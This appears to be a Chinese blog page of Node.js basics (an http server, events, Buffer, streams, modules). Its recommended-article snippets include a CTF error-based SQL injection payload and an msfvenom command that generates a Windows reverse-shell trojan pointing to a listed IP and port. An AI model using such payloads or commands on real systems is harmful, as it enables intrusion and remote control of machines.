const http = require('http')
// 引入http模块
http.createServer(function(req,res){
// 创建一个http服务器
// 这里是一个回调函数
console.log('服务器');
res.writeHead(200,{'Content-Type':'text/plain'});
res.end('hello world\n')
}).listen(8080)

在Node应用程序中,执行异步操作的函数将回调函数作为最后一个参数,回调函数又接收错误对象作为第一个参数

  • 观察者模式:events内置事件模块

    • // 引入 events 模块
      var events = require('events');
      // 创建 eventEmitter 对象
      var eventEmitter = new events.EventEmitter();
      // 绑定事件及事件的处理程序
      eventEmitter.on('eventName', eventHandler);
      // 触发事件
      eventEmitter.emit('eventName');
  • 在 Node.js中,定义了一个 Buffer 类,该类用来创建一个专门存放二进制数据的缓存区。
    • 创建 Buffer 类
    • 写入缓冲区、读取缓冲区数据
    • 将 Buffer 转换成 JSON 对象:buf.toJSON()
      const buf = Buffer.from([0x1, 0x2, 0x3, 0x4, 0x5]);
      const json = JSON.stringify(buf);
      // 当字符串化一个 Buffer 实例时,JSON.stringify() 会隐式地调用该 toJSON()
      // 输出: {"type":"Buffer","data":[1,2,3,4,5]}
      console.log(json);
      const copy = JSON.parse(json, (key, value) => {
      return value && value.type === 'Buffer' ?
      Buffer.from(value.data) :
      value;
      });
      // 输出: <Buffer 01 02 03 04 05>
      console.log(copy);
  • Stream流
    • 读取流、写入流

      var fs = require('fs')
      var zlib = require('zlib') //压缩模块
      var rs = fs.createReadStream('input.txt') // 读取流
      var os = fs.createWriteStream('output.txt') // 写入流
      rs.setEncoding('utf-8')
      rs.on('data',chunk=>{
      os.write(chunk,'UTF8') })
      rs.pipe(os) // 管道流,完成对大文件的慢慢传输
      // 链式流,例:先压缩再写入
      rs.pipe(zlib.createGzip()).pipe(fs.createWriteStream('output.zip'))
      // 链式流,解压(这里压缩文件名后缀必须是'.gz')
      fs.createReadStream('input.txt.gz').pipe(zlib.createGunzip()).pipe(fs.createWriteStream('input.txt'));
  • 模块系统
       

    一个 Node.js 文件就是一个模块,这个文件可能是JavaScript 代码、JSON 或者编译过的C/C++ 扩展

    • exports:暴露'属性名:属性值',key:暴露对象 ; module.exports 暴露'属性值',原生暴露对象
    • require查找顺序:文件模块缓存 -> 原生模块缓存 -> 原生模块 -> 文件模块
    • require接收以下几种模块
      1. http、fs、path等,原生模块
      2. ./mod或../mod,相对路径的文件模块
      3. /pathtomodule/mod,绝对路径的文件模块
      4. mod,非原生模块的文件模块
  • NodeJs全局对象是global,ECMAScript是window
    • 全局变量:全局对象的属性

      • 在最外层定义的变量;
      • 全局对象的属性
      • 隐式定义的变量(未定义直接赋值的变量)

node服务器基本搭建的更多相关文章

  1. 手把手教你从购买vps到搭建一个node服务器

    要准备什么? 1.5刀 2.最好有FQ软件(可以用蓝灯) let's Go! 一.vps购买 vps可以选择digital ocean(do) 链接 ,由于是外国网站,响应比较慢,所以最好翻个墙. g ...

  2. webstorm搭建node服务器

    前言,搭建服务器,必须有node.js环境(吐槽:本来就是用node搭建的(⊙o⊙)…) 下载node.js 网址  https://nodejs.org/en/ 先新建项目: 这里选择Node.js ...

  3. 在服务器上搭建node环境

    一般公司的发布是后台人员完成的,但是作为开发不会发布项目还是有点不高级的感觉 因为没有搭建虚拟机于是就直接在我阿里云的服务器上搭建了node环境, 第一步,前往node官网下载linux下的阿里云的镜 ...

  4. 搭建一个最简单的node服务器

    搭建一个最简单的node服务器 1.创建一个Http服务并监听8888端口 2.使用url模块 获取请求的路由和请求参数 var http = require('http'); var url = r ...

  5. node服务器搭建流程

    1,创建一个空文件夹,用来存放项目. 2,在空文件夹中,在cmd命令提示符中输入npm init  初始化一个服务器项目. 设置的属性信息:    name : 项目名称(小括号中是默认的,文件夹名相 ...

  6. paip.最好的脚本语言node js 环境搭建连接mysql

    paip.最好的脚本语言node js 环境搭建连接mysql #====下载node...走十一个exe..容易的.. 1 #0----Hello world   .js 2 #---------模 ...

  7. rsync服务器的搭建

    Rsync(remote synchronize)是一个远程数据同步工具,简要的概括就是主机于主机之间的文件目录数据的一个同步.下面就是rsync服务器的搭建过程.    系统环境 平台:Centos ...

  8. 阿里云ECS服务器上搭建keepalived+mha+mysql5.6+gtid+一主两从+脚本判断架构踩的坑

    最近,公司项目搭建了一套后端数据库架构,不是在RDS,是在阿里云的ECS服务器上搭建keepalived.mha.mysql5.6.gtid.一主两从架构,目前还没有实现读写分离,以后架构升级,可能代 ...

  9. node.js简单搭建服务,访问本地站点文件

    1.安装nodejs服务(从官网下载安装),node相当于apache服务器 2.在自己定义的目录下新建服务器文件如 server.js 例如,我在D:\nodeJs下创建了server.js文件 v ...

随机推荐

  1. pycharm安装模块方法

    一. 打开pycharm 二. 点开file 三. 点击Settings,点击Project Interpreter,选择右上角+ 四. 进入后,在搜索框搜索需要安装的模块,选中安装 击Project ...

  2. ctfhub 报错注入

    payload   1 Union select count(*),concat((查询语句),0x26,floor(rand(0)*2))x from information_schema.colu ...

  3. Spring Batch远程分区的本地Jar包模式

    1 前言 欢迎访问南瓜慢说 www.pkslow.com获取更多精彩文章! Spring相关文章:Springboot-Cloud Spring Batch远程分区对于大量数据的处理非常擅长,它的实现 ...

  4. msf生成木马

    Msf生成木马:(多层加密都不能免杀) msfvenom -p windows/shell_reverse_tcp lhost=192.168.33.143 lport=7001 -f raw -e ...

  5. Java读取excel 支持xls 和 xlsx格式

    1.工具类public class InExcelTool { //根据指定位置单独读取一个 public static String getContent(String file, int page ...

  6. openstack 介绍

    penstack介绍(1)   一.云计算的前世今生 所有的新事物都不是突然冒出来的,都有前世和今生.云计算也是IT技术不断发展的产物. 要理解云计算,需要对IT系统架构的发展过程有所认识. 请看下 ...

  7. adrci清理日志

    adrci> show home adrci> set home diag/rdbms/mesp/MESP adrci> help purge adrci> purge -ag ...

  8. python-面向过程面向对象和栈的实现

    0x01 大纲 面向过程 函数 参数传递 返回 面向对象 类 栈的数据结构实现 0x02 例子 def add(a,b): return a+b if __name__ == '__main__': ...

  9. redis集群简介

    1.1        集群的概念 所谓的集群,就是通过添加服务器的数量,提供相同的服务,从而让服务器达到一个稳定.高效的状态. 1.1.1       使用redis集群的必要性 问题:我们已经部署好 ...

  10. dubbo学习(十一)dubbo知识点总结

    一.基础概念 Dubbo是个啥? 定义:Dubbo是阿里巴巴开源的基于 Java 的高性能 RPC 分布式远程调用服务框架,现已成为 Apache 基金会孵化项目. 核心功能:远程服务调用. 为什么要 ...